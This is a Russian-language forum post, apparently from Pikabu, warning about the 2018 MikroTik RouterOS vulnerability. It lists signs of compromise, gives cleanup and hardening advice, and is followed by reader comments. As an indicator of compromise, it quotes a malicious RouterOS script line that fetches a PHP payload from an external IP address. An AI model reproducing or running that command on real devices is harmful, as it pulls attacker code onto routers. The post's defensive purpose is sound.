Уязвимости MikroTik

К сожалению скриншотов не будет. Будет сухой текст.

23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS.

Причем уязвимость позволяет узнать логин и  пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно.

Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро.

Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них:

/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http

В файлах соответственно mikrotik.php

Отключаются все запрещающие правила фаервола.

Создаются задачи в планировщике по запуску скрипта.

Открывается сокс-прокси на нестандартном порту.

Меняются адреса днс-серверов.

Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.


Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.

Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.

Ну пару советов по безопасности:

IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.

Грамотно настроить фаерволл.

В случае если факт взлома был зафиксирован - сменить пароль на микротик.


Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533

Информационная безопасность IT

1.4K постов25.5K подписчиков

Добавить пост

Правила сообщества

Обязательно к прочтению для авторов:

1. Если вы добавляете пост, утверждающий об утечке данных или наличии дыр в системе, предоставьте ссылку на источники или технически подкованное расследование. Посты из разряда "Какой-то банк слил данные, потому что мне звонили мошенники" будут выноситься в общую ленту.
2. Все вопросы "Как обезопасить сервер\приложение\устройство" - в лигу "Компьютер это просто".

Обязательно к прочтению для всех:

Добавление ссылки разрешено если она не содержит описание коммерческих (платных) продуктов и/или идентификаторов для отслеживания перехода и для доступа не нужен пароль или оплата в т.ч. интернет-ресурсы, каналы (от 3-х тематических видео), блоги, группы, сообщества, СМИ и т.д.


Запрещены политические holy wars.

По решению модератора или администратора сообщества пользователь будет забанен за:

1. Флуд и оскорбление пользователя, в т.ч. провокация спора, флуда, холивара (высказывание без аргументации о конкретной применимости конкретного решения в конкретной ситуации), требование уже данного ответа, распространение сведений порочащих честь и репутацию, принижающих квалификацию оппонента, переходы на личности.

2. Публикацию поста/комментария не соответствующего тематике сообщества, в том числе обсуждение администраторов и модераторов сообщества, для этого есть специальное сообщество.

3. За обвинение в киберпреступной деятельности.

4. За нарушение прочих Правил Пикабу.

Вы смотрите срез комментариев. Показать все
14
Автор поста оценил этот комментарий

у меня 6.42.6 (актуальная на данный момент), то есть уязвимости нет?

PS. Почитал пост по ссылке - автор опоздал на 3 месяца с инфой, для тех кто обновляется на актуальные проши пост не несет никакой инфы.

раскрыть ветку (9)
7
Автор поста оценил этот комментарий

С правильно настроенным фаерволом можно и на старой жить.

И актуальная прошивка не гарантия, тебя могли ломануть еще на старой прошивке

2
Автор поста оценил этот комментарий
Стоит запустить одну прогу, указать диапазон адресов и сразу понимаешь, СКОЛЬКО тех, кто не обновляется.
Автор поста оценил этот комментарий

пойду обновлюсь. как то раз не мог пароль вспомнить, пришлось сбрасывать. а тут выходит уязвимость есть...(((

2
Автор поста оценил этот комментарий

Подтверждаю, что инфа не актуальна. Как раз пару месяцев назад не обновленные микротики подверглись атаке и положили 2 микрота на разных точках как раз шедулером.

раскрыть ветку (5)
1
Автор поста оценил этот комментарий

Если тебя ломаннули на старой прошивке, то оьновоениемнн поможет. У тебя в конфиге останутся скрипты, которые считай и будут выполнять функции упраявления сломавгим систему - это равносильно вирусу, который уже поразил систему.

Считаю автор незря напомнил о баге.

Автор поста оценил этот комментарий
И пост на Пикабу был... Я уже тогда порадовался, что WinBox отключил к чертям. Вообще не понимаю, почему он по дефолту активен, пускай даже только из локалки.
Если халтурно относиться к безопасности, то никакие патчи не спасут, не успели сломать в этот раз, так умеют в следующий
раскрыть ветку (3)
2
Автор поста оценил этот комментарий
Сам win довольно удобен и с него приятно работать. А то, что много людей забывают болт на firewall это да
DELETED
Автор поста оценил этот комментарий

Мне нравится winbox, работает неприхотливо и быстро.


В чем уязвимость использования его?

раскрыть ветку (1)
1
Автор поста оценил этот комментарий
Он уязвим, если выпячен в интернет, постоянно всплывают какие-нибудь уязвимости. Ну и лично я не сильно понимаю его преимуществ перед веб-интерфейсом
Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку